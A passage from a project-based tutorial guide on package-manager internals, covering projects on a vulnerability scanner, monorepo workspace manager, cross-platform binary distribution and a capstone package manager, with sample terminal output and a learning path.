✓ bin/python → /usr/bin/python3.11
✓ bin/python3 → python
Generating activation scripts:
✓ bin/activate (bash/zsh)
✓ bin/activate.fish
✓ bin/activate.ps1
✓ Environment created. Activate with:
source ~/.venvs/myproject/bin/activate
$ source ~/.venvs/myproject/bin/activate
(myproject) $ which python
~/.venvs/myproject/bin/python
(myproject) $ pip install requests
# Installs to ~/.venvs/myproject/lib/python3.11/site-packages/
(myproject) $ pip list
Package Version
---------- -------
requests 2.31.0
urllib3 2.1.0
pip 23.3.1
(myproject) $ deactivate
$ which python
/usr/bin/python3
$ pip list
# Shows system packages, not myproject's
Implementation Hints:
- The key insight: virtual environments work by prepending their
bin/to PATH - Generate an
activatescript that: saves old PATH, prepends new PATH, sets PS1 prompt, definesdeactivatefunction - Create symlinks from
env/bin/pythonto the actual interpreter - For Python, also set
VIRTUAL_ENVenvironment variable (pip uses this to know where to install) - The
pyvenv.cfgfile tells Python to use the environment’s site-packages - Consider supporting multiple shells (bash, zsh, fish have different syntax)
Learning milestones:
- Create isolated directory structure → You understand env layout
- Generate working activation scripts → You understand shell integration
- Packages install to correct location → You understand isolation
- Multiple envs coexist without conflict → You understand the full system
Project 11: Package Vulnerability Scanner
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Go
- Alternative Programming Languages: Rust, Python, TypeScript
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 2: Intermediate
- Knowledge Area: Security / APIs
- Software or Tool: npm audit / cargo audit Clone
- Main Book: “Foundations of Information Security” by Jason Andress
What you’ll build: A scanner that reads your lock file, queries vulnerability databases (like OSV, GitHub Advisory Database, or npm’s audit API), and reports known CVEs with severity ratings and remediation advice.
Why it teaches package managers: Modern package managers include npm audit and cargo audit because supply chain security matters. You’ll understand how vulnerability databases work, why SBOMs (Software Bills of Materials) exist, and how to assess risk.
Core challenges you’ll face:
- Parsing lock files (extract package names and exact versions) → maps to file parsing
- Querying vulnerability APIs (OSV, GitHub, npm) → maps to API integration
- Matching versions to advisories (is 4.17.15 affected by CVE-2021-xxxx?) → maps to version ranges
- Severity scoring (CVSS, understanding impact) → maps to risk assessment
- Generating actionable reports (what to upgrade to) → maps to user experience
Resources for key challenges:
- OSV (Open Source Vulnerabilities) - Google’s aggregated vulnerability database with API
- GitHub Advisory Database - GitHub’s security advisories
- npm Audit API - npm’s built-in auditing
Key Concepts:
- CVE and CVSS: “Foundations of Information Security” Chapter 15 - Jason Andress
- Software Bill of Materials: SBOM Overview - CISA guidance
- API Integration: “Design and Build Great Web APIs” Chapter 4 - Mike Amundsen
- Supply Chain Security: “Practical Malware Analysis” Chapter 1 (concepts) - Sikorski & Honig
Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTTP APIs, JSON parsing, lock file understanding
Real world outcome:
$ ./vuln-scanner scan package-lock.json
Scanning 247 packages from package-lock.json...
Querying OSV database...
Found 3 vulnerabilities:
┌────────────────────────────────────────────────────────────────────┐
│ CRITICAL: lodash < 4.17.21 │
│ CVE-2021-23337 - Command Injection │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 4.17.15 │
│ Fixed in: 4.17.21 │
│ CVSS: 9.8 (Critical) │
│ Introduced by: express → body-parser → lodash │
│ │
│ Remediation: npm update lodash │
└────────────────────────────────────────────────────────────────────┘
┌────────────────────────────────────────────────────────────────────┐
│ HIGH: minimist < 1.2.6 │
│ CVE-2021-44906 - Prototype Pollution │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 1.2.0 │
│ Fixed in: 1.2.6 │
│ CVSS: 7.5 (High) │
│ Introduced by: mocha → mkdirp → minimist │
│ │
│ Remediation: npm update minimist │
└────────────────────────────────────────────────────────────────────┘
┌────────────────────────────────────────────────────────────────────┐
│ MODERATE: glob-parent < 5.1.2 │
│ CVE-2020-28469 - Regular Expression DoS │
├────────────────────────────────────────────────────────────────────┤
│ Your version: 5.0.0 │
│ Fixed in: 5.1.2 │
│ CVSS: 5.3 (Moderate) │
│ │
│ Remediation: npm update glob-parent │
└────────────────────────────────────────────────────────────────────┘
Summary:
Total packages: 247
Vulnerabilities: 3 (1 critical, 1 high, 1 moderate)
Run with --fix to automatically update vulnerable packages.
Implementation Hints:
- OSV API:
POST https://api.osv.dev/v1/querybatchwith list of packages - Parse lock files to extract
{"package": {"name": "...", "ecosystem": "npm"}, "version": "..."} - Match advisory affected ranges against installed versions (use your semver library from Project 1!)
- CVSS scores: 0.0-3.9 (Low), 4.0-6.9 (Medium), 7.0-8.9 (High), 9.0-10.0 (Critical)
- For remediation, find the minimum fixed version that satisfies the original constraint
Learning milestones:
- Parse lock files and query APIs → You understand the data flow
- Match versions to advisories → You understand vulnerability ranges
- Generate actionable reports → You understand security UX
- Trace vulnerability paths → You understand transitive dependencies
Project 12: Monorepo Workspace Manager
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: TypeScript
- Alternative Programming Languages: Rust, Go, Python
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 4. The “Open Core” Infrastructure
- Difficulty: Level 4: Expert
- Knowledge Area: Build Systems / Graph Algorithms
- Software or Tool: npm workspaces / Turborepo Clone
- Main Book: “Software Architecture in Practice” by Bass, Clements & Kazman
What you’ll build: A monorepo manager that handles multiple packages in one repository, manages inter-package dependencies, builds in correct order with caching, and only rebuilds what changed.
Why it teaches package managers: Modern development uses monorepos (Google, Facebook, Microsoft). Tools like Lerna, Nx, and Turborepo add layers on top of package managers. You’ll understand workspace protocols, local dependencies, and incremental builds.
Core challenges you’ll face:
- Workspace discovery (find all packages in repo) → maps to filesystem traversal
- Local dependency linking (
pkg-adepends onpkg-bin same repo) → maps to symlinks - Topological build order (build deps before dependents) → maps to graph algorithms
- Incremental builds (only rebuild what changed) → maps to change detection
- Task caching (don’t rebuild if inputs unchanged) → maps to content-addressable caching
Key Concepts:
- Topological Sort: “Algorithms, Fourth Edition” Chapter 4.2 - Sedgewick & Wayne
- Build Systems: “The GNU Make Book” Chapter 1 - John Graham-Cumming
- Content Hashing: “Designing Data-Intensive Applications” Chapter 3 - Kleppmann
- Monorepo Patterns: Turborepo docs - Architecture explanation
Difficulty: Expert Time estimate: 3-4 weeks Prerequisites: All previous projects, build system understanding
Real world outcome:
$ tree packages/
packages/
├── core/
│ ├── package.json # "name": "@myorg/core"
│ └── src/
├── utils/
│ ├── package.json # "name": "@myorg/utils", deps: ["@myorg/core"]
│ └── src/
├── api/
│ ├── package.json # "name": "@myorg/api", deps: ["@myorg/core", "@myorg/utils"]
│ └── src/
└── web/
├── package.json # "name": "@myorg/web", deps: ["@myorg/api"]
└── src/
$ ./workspace-manager analyze
Workspace: 4 packages
@myorg/core (0 internal deps)
@myorg/utils (1 internal dep: core)
@myorg/api (2 internal deps: core, utils)
@myorg/web (1 internal dep: api)
Build order (topological):
1. @myorg/core
2. @myorg/utils
3. @myorg/api
4. @myorg/web
$ ./workspace-manager build
Building workspace...
@myorg/core
Hash: a1b2c3d4
Cache: MISS
Building... ✓ (2.1s)
@myorg/utils
Hash: e5f6g7h8
Cache: MISS
Building... ✓ (1.3s)
@myorg/api
Hash: i9j0k1l2
Cache: MISS
Building... ✓ (3.7s)
@myorg/web
Hash: m3n4o5p6
Cache: MISS
Building... ✓ (8.2s)
Total: 15.3s (0 cached)
# Make a change only to @myorg/utils
$ ./workspace-manager build
Building workspace (incremental)...
@myorg/core
Hash: a1b2c3d4
Cache: HIT ✓ (restored in 0.1s)
@myorg/utils
Hash: q7r8s9t0 (changed)
Cache: MISS
Building... ✓ (1.3s)
@myorg/api
Hash: u1v2w3x4 (deps changed)
Cache: MISS
Building... ✓ (3.7s)
@myorg/web
Hash: y5z6a7b8 (deps changed)
Cache: MISS
Building... ✓ (8.2s)
Total: 13.4s (1 cached, saved 2.1s)
Implementation Hints:
- Discover workspaces by finding all
package.jsonfiles with workspace globs (e.g.,"workspaces": ["packages/*"]) - Local dependencies are detected when a dep name matches another workspace package
- For linking, create symlinks in
node_modulespointing to the local package - Compute content hashes by hashing all input files (source, package.json) and dependency hashes
- Store cache in
.workspace-cache/with hash as filename - When a package’s hash changes, all dependents must also be considered changed
Learning milestones:
- Discover and link workspaces → You understand monorepo structure
- Build in topological order → You understand dependency ordering
- Implement content-based caching → You understand incremental builds
- Only rebuild affected packages → You understand the full system
Project 13: Binary Distribution (Platform-Specific Packages)
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: Go, C, C++
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 4: Expert
- Knowledge Area: Cross-Compilation / Platform Detection
- Software or Tool: Binary Package Distributor
- Main Book: “Advanced C and C++ Compiling” by Milan Stevanovic
What you’ll build: A system that builds your CLI tool for multiple platforms (linux-x64, darwin-arm64, windows-x64), packages them with platform-specific metadata, and serves the correct binary based on the user’s system.
Why it teaches package managers: When you npm install esbuild or cargo install ripgrep, how does it know to download the macOS ARM binary on your M1 Mac? This project reveals platform detection, optional dependencies, and binary distribution.
Core challenges you’ll face:
- Cross-compilation (build for different OS/arch from one machine) → maps to compiler toolchains
- Platform detection (os.platform(), os.arch()) → maps to system identification
- Optional/platform-specific dependencies (optionalDependencies in npm) → maps to conditional deps
- Binary packaging (tarballs, zips, npm packages) → maps to distribution formats
- Installation selection (pick correct binary at install time) → maps to runtime selection
Key Concepts:
- Cross-Compilation: “Advanced C and C++ Compiling” Chapter 9 - Milan Stevanovic
- Platform Detection: “The Linux Programming Interface” Chapter 12 - Michael Kerrisk
- npm optionalDependencies: npm docs - How esbuild does it
- ABI Compatibility: “Low-Level Programming” Chapter 14 - Igor Zhirkov
Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Cross-compilation basics, platform differences
Real world outcome:
$ ./platform-builder build ./my-cli
Cross-compiling my-cli for 6 platforms...
linux-x64:
Toolchain: x86_64-unknown-linux-gnu
Building... ✓
Binary: 4.2 MB
linux-arm64:
Toolchain: aarch64-unknown-linux-gnu
Building... ✓
Binary: 3.8 MB
darwin-x64:
Toolchain: x86_64-apple-darwin
Building... ✓
Binary: 3.9 MB
darwin-arm64:
Toolchain: aarch64-apple-darwin
Building... ✓
Binary: 3.6 MB
win32-x64:
Toolchain: x86_64-pc-windows-msvc
Building... ✓
Binary: 4.8 MB (my-cli.exe)
win32-arm64:
Toolchain: aarch64-pc-windows-msvc
Building... ✓
Binary: 4.1 MB
Creating npm packages...
@my-cli/linux-x64@1.0.0 → dist/my-cli-linux-x64-1.0.0.tgz
@my-cli/linux-arm64@1.0.0 → dist/my-cli-linux-arm64-1.0.0.tgz
@my-cli/darwin-x64@1.0.0 → dist/my-cli-darwin-x64-1.0.0.tgz
@my-cli/darwin-arm64@1.0.0 → dist/my-cli-darwin-arm64-1.0.0.tgz
@my-cli/win32-x64@1.0.0 → dist/my-cli-win32-x64-1.0.0.tgz
@my-cli/win32-arm64@1.0.0 → dist/my-cli-win32-arm64-1.0.0.tgz
Creating wrapper package...
my-cli@1.0.0 → dist/my-cli-1.0.0.tgz
optionalDependencies: {
"@my-cli/linux-x64": "1.0.0",
"@my-cli/darwin-arm64": "1.0.0",
...
}
# On user's machine (macOS ARM):
$ npm install my-cli
Installing my-cli...
Resolving platform: darwin-arm64
Selected: @my-cli/darwin-arm64
Downloading... ✓
$ npx my-cli --version
my-cli 1.0.0 (darwin-arm64)
Implementation Hints:
- Use Rust’s cross-compilation with
crosstool, or Go’sGOOS=linux GOARCH=amd64 - npm’s
optionalDependenciesare tried but don’t fail if unavailable—use this for platform packages - The wrapper package has a postinstall script that copies the correct binary from the platform package
- Use
os.platform()andos.arch()in Node.js to detect the current platform - Consider supporting fallback to building from source if no binary is available
Learning milestones:
- Cross-compile for multiple platforms → You understand toolchains
- Create platform-specific npm packages → You understand distribution
- Automatically select correct binary → You understand platform detection
- Handle missing platforms gracefully → You understand fallbacks
Project 14: Full Package Manager (Capstone)
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: Go, C
- Coolness Level: Level 5: Pure Magic (Super Cool)
- Business Potential: 5. The “Industry Disruptor” (VC-Backable Platform)
- Difficulty: Level 5: Master
- Knowledge Area: Systems Programming / Full Stack
- Software or Tool: Complete Package Manager
- Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann
What you’ll build: A complete, working package manager with its own manifest format, lock files, registry, dependency resolution, installation, and CLI—capable of managing real projects.
Why it teaches package managers: This is the capstone. You’ll integrate everything: semver parsing, dependency resolution, registry protocol, lock files, installation, caching, and security. You’ll understand why npm, Cargo, and pip made the design decisions they did.
Core challenges you’ll face:
- Designing a manifest format (your own package.json/Cargo.toml) → maps to language design
- Implementing full resolution (SAT-based or backtracking) → maps to algorithms
- Building a registry server (with publish/download APIs) → maps to distributed systems
- Efficient caching (content-addressable, shared across projects) → maps to storage
- Good CLI UX (progress bars, error messages, colors) → maps to user experience
- Security (checksums, sandboxed scripts, vulnerability checks) → maps to security engineering
Key Concepts:
- All previous project concepts, integrated
- CLI Design: “The Pragmatic Programmer” Chapter 7 - Thomas & Hunt
- API Design: “Design and Build Great Web APIs” - Mike Amundsen
- Systems Architecture: “Designing Data-Intensive Applications” - Martin Kleppmann
Difficulty: Master Time estimate: 2-3 months Prerequisites: All previous projects (1-13)
Real world outcome:
$ mypkg init my-project
Creating new project: my-project
✓ Created mypkg.toml
✓ Created mypkg.lock
✓ Created src/main.rs
$ cat mypkg.toml
[package]
name = "my-project"
version = "0.1.0"
[dependencies]
json = "^1.0"
http-client = "^2.0"
$ mypkg install
Resolving dependencies...
json: 12 versions available
http-client: 8 versions available
Running SAT solver...
✓ Solution found in 23ms
Fetching packages...
▸ json@1.2.3 [████████████████████] 100%
▸ http-client@2.1.0 [████████████████████] 100%
▸ url-parser@1.0.0 [████████████████████] 100% (transitive)
Installing to ./mypkg_modules/...
✓ json@1.2.3
✓ url-parser@1.0.0
✓ http-client@2.1.0
Generating lock file...
✓ mypkg.lock updated
Installed 3 packages in 1.2s
$ mypkg audit
Scanning for vulnerabilities...
✓ No known vulnerabilities found
$ mypkg publish
Publishing my-project@0.1.0...
Packing... ✓ (12 files, 24KB)
Computing integrity... sha512-abc123...
Uploading to registry.mypkg.dev...
✓ Published my-project@0.1.0
View at: https://registry.mypkg.dev/packages/my-project
Implementation Hints:
- Start by defining your manifest format (TOML is recommended for readability)
- Implement the core loop: parse manifest → resolve deps → fetch packages → install → generate lock
- Build the registry server alongside the client (you’ll need both)
- Focus on good error messages—package manager errors are notoriously cryptic
- Implement a global cache (
~/.mypkg/cache/) shared across all projects - Add
--verboseand--debugflags for troubleshooting - Consider writing a specification document for your package format
Learning milestones:
- Basic install flow works → Core system functions
- Lock file enables reproducibility → Deterministic builds
- Registry handles publish/download → Distributed system works
- Resolution handles complex graphs → Algorithm is correct
- Real projects can use it → It’s a real package manager!
Project Comparison Table
| Project | Difficulty | Time | Depth of Understanding | Fun Factor |
|---|---|---|---|---|
| 1. Semver Parser | Intermediate | Weekend | ★★☆☆☆ | ★★☆☆☆ |
| 2. Dependency Graph | Intermediate | Weekend | ★★★☆☆ | ★★★☆☆ |
| 3. SAT Solver | Expert | 2-4 weeks | ★★★★★ | ★★★★☆ |
| 4. Registry Client | Intermediate | 1 week | ★★★☆☆ | ★★★☆☆ |
| 5. Lock File Generator | Advanced | 1-2 weeks | ★★★★☆ | ★★★☆☆ |
| 6. Cellar Installer | Advanced | 1-2 weeks | ★★★★☆ | ★★★★☆ |
| 7. node_modules Hoisting | Advanced | 1-2 weeks | ★★★★☆ | ★★★☆☆ |
| 8. Build Script Executor | Advanced | 1-2 weeks | ★★★☆☆ | ★★★☆☆ |
| 9. Private Registry | Advanced | 2-3 weeks | ★★★★☆ | ★★★★☆ |
| 10. Virtual Env Manager | Advanced | 1-2 weeks | ★★★☆☆ | ★★★☆☆ |
| 11. Vulnerability Scanner | Intermediate | 1 week | ★★★☆☆ | ★★★★☆ |
| 12. Monorepo Manager | Expert | 3-4 weeks | ★★★★★ | ★★★★☆ |
| 13. Binary Distribution | Expert | 2-3 weeks | ★★★★☆ | ★★★★☆ |
| 14. Full Package Manager | Master | 2-3 months | ★★★★★ | ★★★★★ |
Recommended Learning Path
Based on building a solid foundation before tackling complex integration:
Phase 1: Foundations (2-3 weeks)
- Project 1: Semver Parser - You’ll use this everywhere
- Project 2: Dependency Graph - Core data structure
Phase 2: Core Mechanics (4-6 weeks)
- Project 4: Registry Client - Understand the network layer
- Project 5: Lock File Generator - Understand reproducibility
- Project 6: Cellar Installer - Understand installation
Phase 3: Advanced Topics (6-8 weeks)
- Project 3: SAT Solver - The hard problem
- Project 9: Private Registry - Server-side understanding
- Project 7: node_modules Hoisting - npm’s complexity
Phase 4: Security & Scale (4-6 weeks)
- Project 11: Vulnerability Scanner - Security matters
- Project 8: Build Script Executor - Handle native code
- Project 12: Monorepo Manager - Enterprise patterns
Phase 5: Capstone (2-3 months)
- Project 14: Full Package Manager - Put it all together
Final Capstone: “MyPkg” - A Complete Package Manager
If you complete projects 1-13, you’ll have built all the pieces. The capstone (Project 14) is integrating them into a cohesive, usable system. Here’s what makes it real:
A working package manager needs:
- A name and identity (logo, docs site, CLI personality)
- A specification document (what’s valid, what’s not)
- A registry (even if just local file-based to start)
- Error messages that help users fix problems
- Performance that doesn’t frustrate users
- At least one real project using it
You’ll know you’ve succeeded when:
- Someone else can read your spec and implement a compatible client
- A real project can be managed entirely with your tool
- Resolution handles diamond dependencies correctly
- The lock file produces identical installations across machines
- Your CLI feels as polished as npm or Cargo
This is a journey from “package managers are magic” to “I could build npm.” By the end, you’ll have a deep understanding of one of the most important pieces of modern development infrastructure.
Key Resources Summary
Essential Reading
- “Designing Data-Intensive Applications” by Martin Kleppmann - For understanding caching, content addressing, distributed systems
- “The Linux Programming Interface” by Michael Kerrisk - For filesystem, processes, and low-level operations
- “Algorithms, Fourth Edition” by Sedgewick & Wayne - For graph algorithms and data structures
Online Resources
- Dependency Resolution Made Simple - Best SAT-based resolver tutorial
- Version SAT - Why package management is NP-complete
- Let’s Dev: A Package Manager - Yarn team’s tutorial
- npm Registry API - npm protocol spec
- Cargo Registry Index - Cargo protocol spec
Reference Implementations to Study
- pnpm - Innovative content-addressable approach
- uv - Fast Python package manager in Rust
- Cargo - Well-designed, readable codebase
- Verdaccio - Private npm registry
Summary
| # | Project | Main Language |
|---|---|---|
| 1 | Semver Parser & Comparator | Rust |
| 2 | Dependency Graph Builder & Cycle Detector | Python |
| 3 | Version Constraint SAT Solver | Python |
| 4 | Package Registry Client | Go |
| 5 | Lock File Generator | Rust |
| 6 | Cellar-Style Package Installer | C |
| 7 | node_modules Hoisting Simulator | TypeScript |
| 8 | Build Script Executor | Go |
| 9 | Private Registry Server | Go |
| 10 | Virtual Environment Manager | Rust |
| 11 | Package Vulnerability Scanner | Go |
| 12 | Monorepo Workspace Manager | TypeScript |
| 13 | Binary Distribution System | Rust |
| 14 | Full Package Manager (Capstone) | Rust |